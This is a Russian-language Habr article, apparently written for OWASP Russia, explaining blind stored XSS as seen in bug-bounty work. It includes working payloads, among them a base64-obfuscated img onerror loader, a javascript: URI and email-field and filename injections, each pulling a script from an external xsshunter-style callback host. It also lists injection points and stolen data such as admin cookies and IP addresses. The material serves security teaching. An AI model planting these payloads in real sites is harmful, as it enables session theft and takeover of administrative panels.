Хабрахабр

Слепая простота

image

Эксплуатация таких векторов атак приводит к захвату админ-панелей различных сервисов, в том числе софтверных гигантов. В этой статье я расскажу о blind XSS — это довольно простая, но зачастую очень эффективная атака на веб-приложения.

Как это работает?

В первую очередь, стоит отметить, что XSS — это не уязвимость, а тип атаки на веб-системы. Он заключается во внедрении в выдаваемую веб-системой страницу вредоносного кода (который будет выполнен на компьютере пользователя при открытии им этой страницы) и его взаимодействии с веб-сервером злоумышленника. Существует несколько видов XSS: хранимые, отраженные и DOM. В этой статье мы рассмотрим только хранимые XSS — именно они подходят для «пробития» целей.

Схема атаки выглядит следующим образом: атакующий размещает вредоносный пейлоад на веб-приложении, уязвимый код попадает в БД и «выстреливает» в админке проекта.

image

По своему опыту могу сказать, что срабатывания пейлоада происходили от нескольких секунд до нескольких месяцев — ускорить этот процесс крайне проблематично. Зачастую до срабатывания пейлода атакующий не подозревает, где и когда он «выстрелит».

image

Нащупывание конечных точек срабатывания blind XSS сродни стрельбе пулями со смещенным центром тяжести. Где сработает пейлоад — тоже немаловажный фактор. XXX. Порой админ-панели находятся на заковыристых поддоменах вида manage007.attacked.site либо вне тестируемого сайта, на IP-адресе типа XXX. XXX/admin_panel/dashboard.php. XXX. Либо это может быть, например, система аналитики, находящаяся вообще вне пределов тестируемой компании.

Endpoints

Чтобы получить «отстук» от нашего пейлоада, нам необходимо иметь внешний эндпоинт для перехвата. Для этого можно поднять свой сервис и перехватывать все обращения к нему, в т.ч. заголовки, используя приемлемый для вас язык программирования.

image

Либо можно воспользоваться следующими вариантами (на ваш выбор).

BurpCollaborator — специализированный внешний сервис для пользователей Burp Suite Pro:

Использовать сервисы, %name%bin, например requestbin:

Поднять свой собственный сервис, например, с помощью ezXSS:

image

Либо использовать xsshunter (рекомендуется для новичков) — сервис для формирования пейлоадов и получения «отстука» от сработавшего пейлоада (в том числе и на email):

Пейлоады

Итак, мы нашли input-форму на сайте и хотим проверить нашу теорию о том, что в ней сработает блайнд. Для этого нам необходимо подготовить пейлоады, в том числе и для обхода защитных средств.

Сервис xsshunter предлает несолько готовых пейлоадов для эксплуатации blind XSS:

Uri payload:

javascript:eval('var a=document.createElement(\'script\');a.src=\'https://yourpage.xss.ht\';document.body.appendChild(a)')

IMG payload:

"><img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8veW91cnBhZ2UueHNzLmh0Ijtkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKGEpOw onerror=eval(atob(this.id))>

Часть пейлоада преобразована в base64 (dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8veW91cnBhZ2UueHNzLmh0Ijtkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKGEpOw), что на выходе дает:

var a=document.createElement("script");a.src="https://yourpage.xss.ht";document.body.appendChild(a);

Payload в поле e-mail:

"'--></style></title></textarea></script><script src=https://yourpage.xss.ht>"@test.com test@("'--></style></title></textarea></script><script src=https://yourpage.xss.ht>)test.com ("'--></style></title></textarea></script><script src=https://yourpage.xss.ht>)@test.com

Интересные трюки

Теперь рассмотрим наиболее интересные input-формы для внедрения пейлоадов.
E-mail — выше представлены валидные примеры внедрения, сработает или нет — зависит от типа веб-приложения.

В поле пароль — тут мы сможем узнать, хранит ли веб-приложение пароль plain-текстом и видел ли его админ.

Онлайн-помощники — иногда выстреливает и здесь.

В заголовках — подставляем пейлоад во все заголовки, которые мы можем контролировать: referer, user agent и прочее.

SVG содержит пейлоад: Svg-векторы — загрузка изображений/аватаров в виде *.svg может дать нам возможность внедрения нашего пейлоада (пример).

<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"

Поле загрузки файла / название файла — можем попытаться загрузить с названием:

"><img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8veW91cnBhZ2UueHNzLmh0Ijtkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKGEpOw onerror=eval(atob(this.id))>.jpg

Тоже очень перспективная форма для внедрения пейлоада. Unsubscribe — поля отписок, «нам важно ваше мнение» и прочее.

Опросы — поле «другое/свой вариант ответа».

Улов

Эксплуатируя данную атаку, вы можете получить доступ к панели управления (при ненадлежащих настройках безопасности), скриншот, DOM-структуру, IP-адрес админа, куки и т.д.

image

За время участия в программах Bug Bounty накопилось довольно много интересных скриншотов, которые были получены в ходе таких атак: Эта атака позволяет получить доступ к системам поддержки, админ-панелям и многому другому.

Онлайн-казино:

Авто.ру (johndoe1492):

Microsoft (johndoe1492):

Cистема, используемая в 150 000 компаний по всему миру:

Таких скриншотов довольно много — это говорит о том, что разработчикам стоит уделять особое внимание не только витрине веб-приложения, но и его административной части.

Статья подготовлена в рамках участия в проекте OWASP.
OWASP Russia chapter: OWASP Russia
OWASP Russia chat: https://t.me/OWASP_Russia
OWASP Russia channel: https://t.me/OWASP_RU

Теги
Показать больше

Похожие статьи

Добавить комментарий

Ваш e-mail не будет опубликован. Обязательные поля помечены *

Кнопка «Наверх»
Закрыть